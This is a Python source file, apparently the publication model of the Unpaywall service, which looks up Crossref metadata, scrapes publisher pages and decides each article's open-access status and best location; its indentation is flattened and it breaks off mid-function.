from sqlalchemy import orm, sql
from sqlalchemy.dialects.postgresql import JSONB
from sqlalchemy.orm.attributes import flag_modified
import oa_evidence
import oa_local
import oa_manual
import oa_page
import page
from app import db
from app import logger
from http_cache import get_session_id
from journal import Journal
from open_location import OpenLocation, validate_pdf_urls, OAStatus, oa_status_sort_key
from pdf_url import PdfUrl
from pmh_record import is_known_mismatch
from pmh_record import title_is_too_common
from pmh_record import title_is_too_short
from recordthresher.record_maker import CrossrefRecordMaker
from reported_noncompliant_copies import reported_noncompliant_url_fragments
from util import NoDoiException
from util import is_pmc, clamp, clean_doi, fix_url_scheme, normalize_doi
from util import normalize
from util import normalize_title
from util import safe_commit
from webpage import PublisherWebpage
s2_endpoint_id = 'trmgzrn8eq4yx7ddvmzs'
def build_new_pub(doi, crossref_api):
my_pub = Pub(id=doi, crossref_api_raw_new=crossref_api)
my_pub.title = my_pub.crossref_title
my_pub.normalized_title = normalize_title(my_pub.title)
return my_pub
def add_new_pubs(pubs_to_commit):
if not pubs_to_commit:
return []
pubs_indexed_by_id = dict((my_pub.id, my_pub) for my_pub in pubs_to_commit)
ids_already_in_db = [
id_tuple[0] for id_tuple in db.session.query(Pub.id).filter(Pub.id.in_(list(pubs_indexed_by_id.keys()))).all()
]
pubs_to_add_to_db = []
for (pub_id, my_pub) in pubs_indexed_by_id.items():
if pub_id in ids_already_in_db:
# merge if we need to
pass
else:
pubs_to_add_to_db.append(my_pub)
# logger.info(u"adding new pub {}".format(my_pub.id))
if pubs_to_add_to_db:
logger.info("adding {} pubs".format(len(pubs_to_add_to_db)))
db.session.add_all(pubs_to_add_to_db)
safe_commit(db)
return pubs_to_add_to_db
def call_targets_in_parallel(targets):
if not targets:
return
# logger.info(u"calling", targets)
threads = []
for target in targets:
process = Thread(target=target, args=[])
process.start()
threads.append(process)
for process in threads:
try:
process.join(timeout=60*10)
except (KeyboardInterrupt, SystemExit):
pass
except Exception as e:
logger.exception("thread Exception {} in call_targets_in_parallel. continuing.".format(e))
# logger.info(u"finished the calls to {}".format(targets))
def call_args_in_parallel(target, args_list):
# logger.info(u"calling", targets)
threads = []
for args in args_list:
process = Thread(target=target, args=args)
process.start()
threads.append(process)
for process in threads:
try:
process.join(timeout=60*10)
except (KeyboardInterrupt, SystemExit):
pass
except Exception as e:
logger.exception("thread Exception {} in call_args_in_parallel. continuing.".format(e))
# logger.info(u"finished the calls to {}".format(targets))
def lookup_product_by_doi(doi):
biblio = {"doi": doi}
return lookup_product(**biblio)
def lookup_product(**biblio):
my_pub = None
if "doi" in biblio and biblio["doi"]:
doi = normalize_doi(biblio["doi"])
# map unregistered JSTOR DOIs to real articles
# for example https://www.jstor.org/stable/2244328?seq=1 says 10.2307/2244328 on the page
# but https://doi.org/10.2307/2244328 goes nowhere and the article is at https://doi.org/10.1214/aop/1176990626
jstor_overrides = {
'10.2307/2244328': '10.1214/aop/1176990626', # https://www.jstor.org/stable/2244328
'10.2307/25151720': '10.1287/moor.1060.0190', # https://www.jstor.org/stable/25151720
'10.2307/2237638': '10.1214/aoms/1177704711', # https://www.jstor.org/stable/2237638
}
other_overrides = {
# these seem to be the same thing but the first one doesn't work
# https://api.crossref.org/v1/works/http://dx.doi.org/10.3402/qhw.v1i3.4932
# https://api.crossref.org/v1/works/http://dx.doi.org/10.1080/17482620600881144
'10.3402/qhw.v1i3.4932': '10.1080/17482620600881144',
}
doi = jstor_overrides.get(
doi,
other_overrides.get(doi, doi)
)
my_pub = Pub.query.get(doi)
if not my_pub:
# try cleaning DOI further
doi = clean_doi(doi)
my_pub = Pub.query.get(doi)
if not my_pub:
raise NoDoiException
my_pub.reset_vars()
return my_pub
def refresh_pub(my_pub, do_commit=False):
my_pub.run_with_hybrid()
db.session.merge(my_pub)
if do_commit:
safe_commit(db)
return my_pub
def thread_result_wrapper(func, args, res):
res.append(func(*args))
# get rid of this when we get rid of POST endpoint
# for now, simplify it so it just calls the single endpoint
def get_pubs_from_biblio(biblios, run_with_hybrid=False):
returned_pubs = []
for biblio in biblios:
returned_pubs.append(get_pub_from_biblio(biblio, run_with_hybrid=run_with_hybrid))
return returned_pubs
def get_pub_from_biblio(biblio, run_with_hybrid=False, skip_all_hybrid=False):
my_pub = lookup_product(**biblio)
if run_with_hybrid:
my_pub.run_with_hybrid()
safe_commit(db)
else:
my_pub.recalculate()
return my_pub
def max_pages_from_one_repo(endpoint_ids):
endpoint_id_counter = Counter(endpoint_ids)
most_common = endpoint_id_counter.most_common(1)
if most_common:
return most_common[0][1]
return 0
def get_citeproc_date(year=0, month=1, day=1):
try:
return datetime.date(year, month, day)
except ValueError:
return None
def csv_dict_from_response_dict(data):
if not data:
return None
response = defaultdict(str)
response["doi"] = data.get("doi", None)
response["doi_url"] = data.get("doi_url", None)
response["is_oa"] = data.get("is_oa", None)
response["oa_status"] = data.get("oa_status", None)
response["genre"] = data.get("genre", None)
response["is_paratext"] = data.get("is_paratext", None)
response["journal_name"] = data.get("journal_name", None)
response["journal_issns"] = data.get("journal_issns", None)
response["journal_issn_l"] = data.get("journal_issn_l", None)
response["journal_is_oa"] = data.get("journal_is_oa", None)
response["journal_is_in_doaj"] = data.get("journal_is_in_doaj", None)
response["publisher"] = data.get("publisher", None)
response["published_date"] = data.get("published_date", None)
response["data_standard"] = data.get("data_standard", None)
best_location_data = data.get("best_oa_location", None)
if not best_location_data:
best_location_data = defaultdict(str)
response["best_oa_url"] = best_location_data.get("url", "")
response["best_oa_url_is_pdf"] = best_location_data.get("url_for_pdf", "") != ""
response["best_oa_evidence"] = best_location_data.get("evidence", None)
response["best_oa_host"] = best_location_data.get("host_type", None)
response["best_oa_version"] = best_location_data.get("version", None)
response["best_oa_license"] = best_location_data.get("license", None)
return response
def build_crossref_record(data):
if not data:
return None
record = {}
simple_fields = [
"publisher",
"subject",
"link",
"license",
"funder",
"type",
"update-to",
"clinical-trial-number",
"ISSN", # needs to be uppercase
"ISBN", # needs to be uppercase
"alternative-id"
]
for field in simple_fields:
if field in data:
record[field.lower()] = data[field]
if "title" in data:
if isinstance(data["title"], str):
record["title"] = data["title"]
else:
if data["title"]:
record["title"] = data["title"][0] # first one
if "title" in record and record["title"]:
record["title"] = re.sub("\s+", " ", record["title"])
if "container-title" in data:
record["all_journals"] = data["container-title"]
if isinstance(data["container-title"], str):
record["journal"] = data["container-title"]
else:
if data["container-title"]:
record["journal"] = data["container-title"][-1] # last one
# get rid of leading and trailing newlines
if record.get("journal", None):
record["journal"] = record["journal"].strip()
if "author" in data:
# record["authors_json"] = json.dumps(data["author"])
record["all_authors"] = data["author"]
if data["author"]:
first_author = data["author"][0]
if first_author and "family" in first_author:
record["first_author_lastname"] = first_author["family"]
for author in record["all_authors"]:
if author and "affiliation" in author and not author.get("affiliation", None):
del author["affiliation"]
if "issued" in data:
# record["issued_raw"] = data["issued"]
try:
if "raw" in data["issued"]:
record["year"] = int(data["issued"]["raw"])
elif "date-parts" in data["issued"]:
record["year"] = int(data["issued"]["date-parts"][0][0])
date_parts = data["issued"]["date-parts"][0]
pubdate = get_citeproc_date(*date_parts)
if pubdate:
record["pubdate"] = pubdate.isoformat()
except (IndexError, TypeError):
pass
if "deposited" in data:
try:
record["deposited"] = data["deposited"]["date-time"]
except (IndexError, TypeError):
pass
record["added_timestamp"] = datetime.datetime.utcnow().isoformat()
return record
class PmcidPublishedVersionLookup(db.Model):
pmcid = db.Column(db.Text, db.ForeignKey('pmcid_lookup.pmcid'), primary_key=True)
class PmcidLookup(db.Model):
doi = db.Column(db.Text, db.ForeignKey('pub.id'), primary_key=True)
pmcid = db.Column(db.Text)
release_date = db.Column(db.Text)
pmcid_pubished_version_link = db.relationship(
'PmcidPublishedVersionLookup',
lazy='subquery',
viewonly=True,
backref=db.backref("pmcid_lookup", lazy="subquery"),
foreign_keys="PmcidPublishedVersionLookup.pmcid"
)
@property
def version(self):
if self.pmcid_pubished_version_link:
return "publishedVersion"
return "acceptedVersion"
class IssnlLookup(db.Model):
__tablename__ = 'journalsdb_issn_to_issn_l'
issn = db.Column(db.Text, primary_key=True)
issn_l = db.Column(db.Text)
journalsdb_id = db.Column(db.Text)
class JournalOaStartYear(db.Model):
__tablename__ = 'journal_oa_start_year_patched'
issn_l = db.Column(db.Text, primary_key=True)
title = db.Column(db.Text)
oa_year = db.Column(db.Integer)
class S2Lookup(db.Model):
__tablename__ = 'semantic_scholar'
doi = db.Column(db.Text, primary_key=True)
s2_url = db.Column(db.Text)
s2_pdf_url = db.Column(db.Text)
class GreenScrapeAction(Enum):
scrape_now = 1
queue = 2
none = 3
class Preprint(db.Model):
preprint_id = db.Column(db.Text, primary_key=True)
postprint_id = db.Column(db.Text, primary_key=True)
def __repr__(self):
return '<Preprint {}, {}>'.format(self.preprint_id, self.postprint_id)
class Retraction(db.Model):
retraction_doi = db.Column(db.Text, primary_key=True)
retracted_doi = db.Column(db.Text, primary_key=True)
def __repr__(self):
return '<Retraction {}, {}>'.format(self.retraction_doi, self.retracted_doi)
class FilteredPreprint(db.Model):
preprint_id = db.Column(db.Text, primary_key=True)
postprint_id = db.Column(db.Text, primary_key=True)
def __repr__(self):
return '<FilteredPreprint {}, {}>'.format(self.preprint_id, self.postprint_id)
class PubRefreshResult(db.Model):
id = db.Column(db.Text, primary_key=True)
refresh_time = db.Column(db.DateTime, primary_key=True)
oa_status_before = db.Column(db.Text)
oa_status_after = db.Column(db.Text)
def __repr__(self):
return f'<PubRefreshResult({self.id}, {self.refresh_time}, {self.oa_status_before}, {self.oa_status_after})>'
LANDING_PAGE_ARCHIVE_BUCKET = 'unpaywall-doi-landing-page'
class Pub(db.Model):
id = db.Column(db.Text, primary_key=True)
updated = db.Column(db.DateTime)
crossref_api_raw_new = db.Column(JSONB)
published_date = db.Column(db.DateTime)
title = db.Column(db.Text)
normalized_title = db.Column(db.Text)
issns_jsonb = db.Column(JSONB)
last_changed_date = db.Column(db.DateTime)
response_jsonb = db.Column(JSONB)
response_is_oa = db.Column(db.Boolean)
response_best_evidence = db.Column(db.Text)
response_best_url = db.Column(db.Text)
response_best_host = db.Column(db.Text)
response_best_repo_id = db.Column(db.Text)
response_best_version = db.Column(db.Text)
scrape_updated = db.Column(db.DateTime)
scrape_evidence = db.Column(db.Text)
scrape_pdf_url = db.Column(db.Text)
scrape_metadata_url = db.Column(db.Text)
scrape_license = db.Column(db.Text)
resolved_doi_url = db.Column(db.Text)
resolved_doi_http_status = db.Column(db.SmallInteger)
doi_landing_page_is_archived = db.Column(db.Boolean)
recordthresher_id = db.Column(db.Text)
error = db.Column(db.Text)
rand = db.Column(db.Numeric)
pmcid_links = db.relationship(
'PmcidLookup',
lazy='subquery',
viewonly=True,
backref=db.backref("pub", lazy="subquery"),
foreign_keys="PmcidLookup.doi"
)
page_matches_by_doi = db.relationship(
'Page',
lazy='subquery',
viewonly=True,
backref=db.backref("pub_by_doi", lazy="subquery"),
foreign_keys="Page.doi"
)
repo_page_matches_by_doi = db.relationship(
'RepoPage',
lazy='subquery',
viewonly=True,
primaryjoin="and_(RepoPage.match_doi == True, RepoPage.doi == Pub.id)"
)
repo_page_matches_by_title = db.relationship(
'RepoPage',
lazy='subquery',
viewonly=True,
primaryjoin="and_(RepoPage.match_title == True, RepoPage.normalized_title == Pub.normalized_title)"
)
def __init__(self, **biblio):
self.reset_vars()
self.rand = random.random()
self.license = None
self.free_metadata_url = None
self.free_pdf_url = None
self.oa_status = None
self.evidence = None
self.open_locations = []
self.embargoed_locations = []
self.closed_urls = []
self.session_id = None
self.version = None
self.issn_l = None
self.journalsdb_journal_id = None
# self.updated = datetime.datetime.utcnow()
for (k, v) in biblio.items():
self.__setattr__(k, v)
@orm.reconstructor
def init_on_load(self):
self.reset_vars()
def reset_vars(self):
if self.id and self.id.startswith("10."):
self.id = normalize_doi(self.id)
self.license = None
self.free_metadata_url = None
self.free_pdf_url = None
self.oa_status = None
self.evidence = None
self.open_locations = []
self.embargoed_locations = []
self.closed_urls = []
self.session_id = None
self.version = None
issn_l_lookup = self.lookup_issn_l()
self.issn_l = issn_l_lookup.issn_l if issn_l_lookup else None
self.journalsdb_journal_id = issn_l_lookup.journalsdb_id if issn_l_lookup else None
@property
def doi(self):
return self.id
@property
def unpaywall_api_url(self):
return "https://api.unpaywall.org/v2/{}?email=internal@impactstory.org".format(self.id)
@property
def tdm_api(self):
return None
@property
def crossref_api_raw(self):
record = None
try:
if self.crossref_api_raw_new:
return self.crossref_api_raw_new
except IndexError:
pass
return record
@property
def crossref_api_modified(self):
record = None
if self.crossref_api_raw_new:
try:
return build_crossref_record(self.crossref_api_raw_new)
except IndexError:
pass
if self.crossref_api_raw:
try:
record = build_crossref_record(self.crossref_api_raw)
print("got record")
return record
except IndexError:
pass
return record
@property
def open_urls(self):
# return sorted urls, without dups
urls = []
for location in self.sorted_locations:
if location.best_url not in urls:
urls.append(location.best_url)
return urls
@property
def url(self):
if self.doi and self.doi.startswith('10.2218/forum.'):
article_id = self.doi.split('.')[-1]
return f'http://journals.ed.ac.uk/forum/article/view/{article_id}';
return "https://doi.org/{}".format(self.id)
@property
def is_oa(self):
return bool(self.fulltext_url)
@property
def is_paratext(self):
paratext_exprs = [
r'^Author Index$'
r'^Back Cover',
r'^Contents$',
r'^Contents:',
r'^Cover Image',
r'^Cover Picture',
r'^Editorial Board',
r'^Front Cover',
r'^Frontispiece',
r'^Inside Back Cover',
r'^Inside Cover',
r'^Inside Front Cover',
r'^Issue Information',
r'^List of contents',
r'^Masthead',
r'^Title page',
]
for expr in paratext_exprs:
if self.title and re.search(expr, self.title, re.IGNORECASE):
return True
return False
@property
def is_retracted(self):
return bool(
Retraction.query.filter(Retraction.retracted_doi == self.doi).all()
)
def recalculate(self, quiet=False, ask_preprint=True):
self.clear_locations()
if self.publisher == "CrossRef Test Account":
self.error += "CrossRef Test Account"
raise NoDoiException
if self.journal == "CrossRef Listing of Deleted DOIs":
self.error += "CrossRef Deleted DOI"
raise NoDoiException
self.find_open_locations(ask_preprint)
self.decide_if_open()
self.set_license_hacks()
if self.is_oa and not quiet:
logger.info("**REFRESH found a fulltext_url for {}! {}: {} **".format(
self.id, self.oa_status.value, self.fulltext_url))
def refresh_crossref(self):
from put_crossref_in_db import get_api_for_one_doi
self.crossref_api_raw_new = get_api_for_one_doi(self.doi)
def refresh_including_crossref(self):
self.refresh_crossref()
return self.refresh()
def refresh(self, session_id=None):
self.session_id = session_id or get_session_id()
refresh_result = PubRefreshResult(
id=self.id,
refresh_time=datetime.datetime.utcnow(),
oa_status_before=self.response_jsonb and self.response_jsonb.get('oa_status', None)
)
# self.refresh_green_locations()
self.refresh_hybrid_scrape()
# and then recalculate everything, so can do to_dict() after this and it all works
self.update(force_update_rt=True)
refresh_result.oa_status_after = self.response_jsonb and self.response_jsonb.get('oa_status', None)
db.session.merge(refresh_result)
# then do this so the recalculated stuff saves
# it's ok if this takes a long time... is a short time compared to refresh_hybrid_scrape
db.session.merge(self)
def create_or_update_recordthresher_record(self):
if rt_record := CrossrefRecordMaker.make_record(self):
db.session.merge(rt_record)
self.recordthresher_id = rt_record.id
def set_results(self):
self.issns_jsonb = self.issns
self.response_jsonb = self.to_dict_v2()
self.response_is_oa = self.is_oa
self.response_best_url = self.best_url
self.response_best_evidence = self.best_evidence
self.response_best_version = self.best_version
self.response_best_host = self.best_host
self.response_best_repo_id = self.best_repo_id
def clear_results(self):
self.response_jsonb = None
self.response_is_oa = None
self.response_best_url = None
self.response_best_evidence = None
self.response_best_version = None
self.response_best_host = None
self.response_best_repo_id = None
self.error = ""
self.issns_jsonb = None
@staticmethod
def ignored_keys_for_internal_diff():
# remove these keys from comparison because their contents are volatile or we don't care about them
return ["updated", "last_changed_date", "x_reported_noncompliant_copies", "x_error", "data_standard"]
@staticmethod
def ignored_keys_for_external_diff():
# remove these keys because they have been added to the api response but we don't want to trigger a diff
return Pub.ignored_keys_for_internal_diff()
@staticmethod
def ignored_top_level_keys_for_external_diff():
# existing ignored key regex method doesn't work for multiline keys
# but don't want to replace it yet because it works on nested rows
return ["z_authors", "oa_locations_embargoed"]
@staticmethod
def remove_response_keys(jsonb_response, keys):
response_copy = json.loads(json.dumps(jsonb_response))
for key in keys:
try:
del response_copy[key]
except KeyError:
pass
return response_copy
def has_changed(self, old_response_jsonb, ignored_keys, ignored_top_level_keys):
if not old_response_jsonb:
logger.info("response for {} has changed: no old response".format(self.id))
return True
copy_of_new_response = Pub.remove_response_keys(self.response_jsonb, ignored_top_level_keys)
copy_of_old_response = Pub.remove_response_keys(old_response_jsonb, ignored_top_level_keys)
# have to sort to compare
copy_of_new_response_in_json = json.dumps(copy_of_new_response, sort_keys=True, indent=2)
# have to sort to compare
copy_of_old_response_in_json = json.dumps(copy_of_old_response, sort_keys=True, indent=2)
for key in ignored_keys:
# remove it
copy_of_new_response_in_json = re.sub(r'"{}":\s*".+?",?\s*'.format(key), '', copy_of_new_response_in_json)
copy_of_old_response_in_json = re.sub(r'"{}":\s*".+?",?\s*'.format(key), '', copy_of_old_response_in_json)
# also remove it if it is an empty list
copy_of_new_response_in_json = re.sub(r'"{}":\s*\[\],?\s*'.format(key), '', copy_of_new_response_in_json)
copy_of_old_response_in_json = re.sub(r'"{}":\s*\[\],?\s*'.format(key), '', copy_of_old_response_in_json)
# also anything till a comma (gets data_standard)
copy_of_new_response_in_json = re.sub(r'"{}":\s*.+?,\s*'.format(key), '', copy_of_new_response_in_json)
copy_of_old_response_in_json = re.sub(r'"{}":\s*.+?,\s*'.format(key), '', copy_of_old_response_in_json)
return copy_of_new_response_in_json != copy_of_old_response_in_json
def update(self, force_update_rt=False):
return self.recalculate_and_store(force_update_rt=force_update_rt)
def recalculate_and_store(self, force_update_rt=False):
if not self.crossref_api_raw_new:
self.crossref_api_raw_new = self.crossref_api_raw
self.title = self.crossref_title
self.normalized_title = normalize_title(self.title)
if not self.published_date:
self.published_date = self.issued
if not self.rand:
self.rand = random.random()
old_response_jsonb = self.response_jsonb
self.clear_results()
try:
self.recalculate()
except NoDoiException:
logger.info("invalid doi {}".format(self))
self.error += "Invalid DOI"
pass
self.set_results()
self.mint_pages()
self.scrape_green_locations(GreenScrapeAction.queue)
self.store_pdf_urls_for_validation()
self.store_refresh_priority()
self.store_preprint_relationships()
self.store_retractions()
response_changed = self.decide_if_response_changed(old_response_jsonb)
if force_update_rt or response_changed:
self.create_or_update_recordthresher_record()
def decide_if_response_changed(self, old_response_jsonb):
response_changed = False
if self.has_changed(old_response_jsonb, Pub.ignored_keys_for_external_diff(), Pub.ignored_top_level_keys_for_external_diff()):
logger.info("changed! updating last_changed_date for this record! {}".format(self.id))
self.last_changed_date = datetime.datetime.utcnow().isoformat()
response_changed = True
if self.has_changed(old_response_jsonb, Pub.ignored_keys_for_internal_diff(), []):
logger.info("changed! updating updated timestamp for this record! {}".format(self.id))
self.updated = datetime.datetime.utcnow()
self.response_jsonb['updated'] = datetime.datetime.utcnow().isoformat()
response_changed = True
if response_changed:
flag_modified(self, "response_jsonb") # force it to be saved
else:
self.response_jsonb = old_response_jsonb # don't save if only ignored fields changed
return response_changed
def run(self):
try:
self.recalculate_and_store()
except NoDoiException:
logger.info("invalid doi {}".format(self))
self.error += "Invalid DOI"
pass
# logger.info(json.dumps(self.response_jsonb, indent=4))
def run_with_hybrid(self, quiet=False, shortcut_data=None):
logger.info("in run_with_hybrid")
self.clear_results()
try:
self.refresh()
except NoDoiException:
logger.info("invalid doi {}".format(self))
self.error += "Invalid DOI"
pass
# set whether changed or not
self.set_results()
@property
def has_been_run(self):
if self.evidence:
return True
return False
@property
def best_redirect_url(self):
return self.fulltext_url or self.url
@property
def has_fulltext_url(self):
return self.fulltext_url is not None
@property
def has_license(self):
if not self.license:
return False
if self.license == "unknown":
return False
return True
@property
def clean_doi(self):
if not self.id:
return None
return normalize_doi(self.id)
def ask_manual_overrides(self):
if not self.doi:
return
override_dict = oa_manual.get_override_dict(self)
if override_dict is not None:
logger.info("manual override for {}".format(self.doi))
self.open_locations = []
if override_dict:
my_location = OpenLocation()
my_location.pdf_url = None
my_location.metadata_url = None
my_location.license = None
my_location.version = None
my_location.evidence = "manual"
my_location.doi = self.doi
# set just what the override dict specifies
for (k, v) in override_dict.items():
setattr(my_location, k, v)
# don't append, make it the only one
self.open_locations.append(my_location)
def ask_preprints(self):
preprint_relationships = FilteredPreprint.query.filter(FilteredPreprint.postprint_id == self.doi).all()
for preprint_relationship in preprint_relationships:
preprint_pub = Pub.query.get(preprint_relationship.preprint_id)
if preprint_pub:
try:
# don't look for pre/postprints here or you get circular lookups
preprint_pub.recalculate(ask_preprint=False)
# get the best location that's actually a preprint - don't include other copies of the preprint
all_locations = preprint_pub.deduped_sorted_locations
preprint_locations = [loc for loc in all_locations if loc.host_type == 'repository']
if preprint_locations:
self.open_locations.append(preprint_locations[0])
except NoDoiException:
pass
def ask_postprints(self):
preprint_relationships = FilteredPreprint.query.filter(FilteredPreprint.preprint_id == self.doi).all()
for preprint_relationship in preprint_relationships:
postprint_pub = Pub.query.get(preprint_relationship.postprint_id)
if postprint_pub:
try:
# don't look for pre/postprints here or you get circular lookups
postprint_pub.recalculate(ask_preprint=False)
# get the best location that's actually a postprint - don't include other preprints
all_locations = postprint_pub.deduped_sorted_locations
postprint_locations = [loc for loc in all_locations if loc.host_type == 'publisher' and loc.version == 'publishedVersion']
if postprint_locations:
self.open_locations.append(postprint_locations[0])
except NoDoiException:
pass
@property
def fulltext_url(self):
return self.free_pdf_url or self.free_metadata_url or None
@property
def is_preprint(self):
return self.genre == 'posted-content' and not self.issns
def make_preprint(self, oa_location):
oa_location.evidence = re.sub(r'.*?(?= \(|$)', 'oa repository', oa_location.evidence or '', 1)
oa_location.version = "submittedVersion"
def decide_if_open(self):
# look through the locations here
# overwrites, hence the sorting
self.license = None
self.free_metadata_url = None
self.free_pdf_url = None
self.oa_status = OAStatus.closed
self.version = None
self.evidence = None
reversed_sorted_locations = self.sorted_locations
reversed_sorted_locations.reverse()
# go through all the locations, using valid ones to update the best open url data
for location in reversed_sorted_locations:
self.free_pdf_url = location.pdf_url
self.free_metadata_url = location.metadata_url
self.evidence = location.evidence
self.version = location.version
self.license = location.license
if reversed_sorted_locations:
if self.is_preprint:
self.oa_status = OAStatus.green
else:
self.oa_status = sorted(reversed_sorted_locations, key=oa_status_sort_key)[-1].oa_status
# don't return an open license on a closed thing, that's confusing
if not self.fulltext_url:
self.license = None
self.evidence = None
self.oa_status = OAStatus.closed
self.version = None
def clear_locations(self):
self.reset_vars()
@property
def has_hybrid(self):
return any([location.oa_status is OAStatus.hybrid for location in self.all_oa_locations])
@property
def has_gold(self):
return any([location.oa_status is OAStatus.gold for location in self.all_oa_locations])
@property
def has_green(self):
return any([location.oa_status is OAStatus.green for location in self.all_oa_locations])
def refresh_green_locations(self):
for my_page in self.pages:
my_page.scrape()
def refresh_hybrid_scrape(self):
logger.info("***** {}: {}".format(self.publisher, self.journal))
# look for hybrid
self.scrape_updated = datetime.datetime.utcnow()
# reset
self.scrape_evidence = None
self.scrape_pdf_url = None
self.scrape_metadata_url = None
self.scrape_license = None
self.resolved_doi_url = None
if self.url:
with PublisherWebpage(url=self.url,
related_pub_doi=self.doi,
related_pub_publisher=self.publisher,
session_id=self.session_id,
issn_l=self.issn_l) as publisher_landing_page:
# end the session before the scrape
# logger.info(u"closing session for {}".format(self.doi))
db.session.close()
self.scrape_page_for_open_location(publisher_landing_page)
self.resolved_doi_url = publisher_landing_page.resolved_url
self.resolved_doi_http_status = publisher_landing_page.resolved_http_status_code
# now merge our object back in
# logger.info(u"after scrape, merging {}".format(self.doi))
db.session.merge(self)
self.save_landing_page_text(publisher_landing_page.page_text)
if publisher_landing_page.is_open:
self.scrape_evidence = publisher_landing_page.open_version_source_string
self.scrape_pdf_url = publisher_landing_page.scraped_pdf_url
self.scrape_metadata_url = publisher_landing_page.scraped_open_metadata_url
self.scrape_license = publisher_landing_page.scraped_license
if (publisher_landing_page.is_open
and not publisher_landing_page.scraped_pdf_url
and not publisher_landing_page.use_resolved_landing_url(publisher_landing_page.scraped_open_metadata_url)
):
self.scrape_metadata_url = self.url
# Academic Medicine, delayed OA
if self.issn_l == '1040-2446' and self.issued < datetime.datetime.utcnow().date() - relativedelta(months=14):
if not self.scrape_metadata_url:
self.scrape_evidence = 'open (via free article)'
self.scrape_metadata_url = publisher_landing_page.resolved_url
logger.info('making {} bronze due to delayed OA policy'.format(self.doi))
# Genome Research, delayed OA
if self.issn_l == '1088-9051' and (self.issued < datetime.datetime.utcnow().date() - relativedelta(months=7) or self.scrape_pdf_url):
logger.info('making {} hybrid due to delayed OA policy'.format(self.doi))
self.scrape_evidence = 'open (via page says license)'
self.scrape_metadata_url = self.url
self.scrape_license = 'cc-by-nc'
return
def save_landing_page_text(self, page_text):
if not page_text:
return
try:
logger.info(f'saving {len(page_text)} characters to {self.landing_page_archive_url()}')
client = boto3.client('s3')
client.put_object(
Body=gzip.compress(page_text.encode('utf-8')),
Bucket=LANDING_PAGE_ARCHIVE_BUCKET,
Key=self.landing_page_archive_key()
)
self.doi_landing_page_is_archived = True
except Exception as e:
# page text is just nice-to-have for now
logger.error(f'failed to save landing page: {e}')
def find_open_locations(self, ask_preprint=True):
# just based on doi
if local_lookup := self.ask_local_lookup():
if local_lookup['is_future']:
self.embargoed_locations.append(local_lookup['location'])
else:
self.open_locations.append(local_lookup['location'])
self.ask_pmc()
# based on titles
self.set_title_hacks() # has to be before ask_green_locations, because changes titles
self.ask_green_locations()
self.ask_publisher_equivalent_pages()
self.ask_hybrid_scrape()
self.ask_s2()
if ask_preprint:
self.ask_preprints()
self.ask_postprints()
self.ask_manual_overrides()
self.remove_redundant_embargoed_locations()
def landing_page_archive_key(self):
return urllib.parse.quote(self.doi, safe='')
def landing_page_archive_url(self):
return f's3://{LANDING_PAGE_ARCHIVE_BUCKET}/{self.landing_page_archive_key()}'
def remove_redundant_embargoed_locations(self):
if any([loc.host_type == 'publisher' for loc in self.all_oa_locations]):
self.embargoed_locations = [loc for loc in self.embargoed_locations if loc.host_type != 'publisher']
def ask_local_lookup(self):
evidence = None
fulltext_url = self.url
license = None
pdf_url = None
version = "publishedVersion" # default
oa_date = None
publisher_specific_license = None
if oa_local.is_open_via_doaj(self.issns, self.all_journals, self.year):
license = oa_local.is_open_via_doaj(self.issns, self.all_journals, self.year)
evidence = oa_evidence.oa_journal_doaj
oa_date = self.issued
crossref_license = oa_local.is_open_via_license_urls(self.crossref_licenses, self.issns)
if crossref_license:
freetext_license = crossref_license['url']
license = oa_local.find_normalized_license(freetext_license)
elif (
any(self.is_same_publisher(p) for p in ['BMJ', 'Swiss Chemical Society'])
and self.scrape_license
):
license = self.scrape_license
elif oa_local.is_open_via_publisher(self.publisher):
evidence = oa_evidence.oa_journal_publisher
license = oa_local.find_normalized_license(oa_local.is_open_via_publisher(self.publisher))
if license == 'implied-oa' and self.scrape_license:
license = self.scrape_license
oa_date = self.issued
elif oa_local.is_open_via_publisher_genre(self.publisher, self.genre):
evidence = oa_evidence.oa_journal_publisher
license = oa_local.find_normalized_license(oa_local.is_open_via_publisher_genre(self.publisher, self.genre))
oa_date = self.issued
elif self.is_open_journal_via_observed_oa_rate():
evidence = oa_evidence.oa_journal_observed
oa_date = self.issued
elif oa_local.is_open_via_manual_journal_setting(self.issns, self.year):
evidence = oa_evidence.oa_journal_manual
oa_date = self.issued
license = oa_local.manual_gold_journal_license(self.issn_l)
elif oa_local.is_open_via_doi_fragment(self.doi):
evidence = "oa repository (via doi prefix)"
oa_date = self.issued
elif oa_local.is_open_via_journal_doi_prefix(self.doi):
evidence = "oa journal (via doi prefix)"
oa_date = self.issued
elif oa_local.is_open_via_url_fragment(self.url):
evidence = "oa repository (via url prefix)"
oa_date = self.issued
elif oa_local.is_open_via_license_urls(self.crossref_licenses, self.issns):
crossref_license = oa_local.is_open_via_license_urls(self.crossref_licenses, self.issns)
freetext_license = crossref_license['url']
license = oa_local.find_normalized_license(freetext_license)
evidence = "open (via crossref license)"
oa_date = crossref_license['date'] or self.issued
elif self.open_manuscript_licenses:
manuscript_license = self.open_manuscript_licenses[-1]
has_open_manuscript = True
freetext_license = manuscript_license['url']
license = oa_local.find_normalized_license(freetext_license)
oa_date = manuscript_license['date'] or self.issued
if freetext_license and not license:
license = "publisher-specific, author manuscript"
publisher_specific_license = freetext_license
version = "acceptedVersion"
if self.is_same_publisher("Elsevier BV"):
elsevier_id = self.crossref_alternative_id
pdf_url = "http://manuscript.elsevier.com/{}/pdf/{}.pdf".format(elsevier_id, elsevier_id)
elif self.is_same_publisher("American Physical Society (APS)"):
proper_case_id = self.id
proper_case_id = proper_case_id.replace("revmodphys", "RevModPhys")
proper_case_id = proper_case_id.replace("physrevlett", "PhysRevLett")
proper_case_id = proper_case_id.replace("physreva", "PhysRevA")
proper_case_id = proper_case_id.replace("physrevb", "PhysRevB")
proper_case_id = proper_case_id.replace("physrevc", "PhysRevC")
proper_case_id = proper_case_id.replace("physrevd", "PhysRevD")
proper_case_id = proper_case_id.replace("physreve", "PhysRevE")
proper_case_id = proper_case_id.replace("physrevx", "PhysRevX")
proper_case_id = proper_case_id.replace("physrevaccelbeams", "PhysRevAccelBeams")
proper_case_id = proper_case_id.replace("physrevapplied", "PhysRevApplied")
proper_case_id = proper_case_id.replace("physrevphyseducres", "PhysRevPhysEducRes")
proper_case_id = proper_case_id.replace("physrevstper", "PhysRevSTPER")
if proper_case_id != self.id:
pdf_url = "https://link.aps.org/accepted/{}".format(proper_case_id)
elif self.is_same_publisher("AIP Publishing"):
pdf_url = "https://aip.scitation.org/doi/{}".format(self.id)
elif self.is_same_publisher("IOP Publishing"):
has_open_manuscript = False
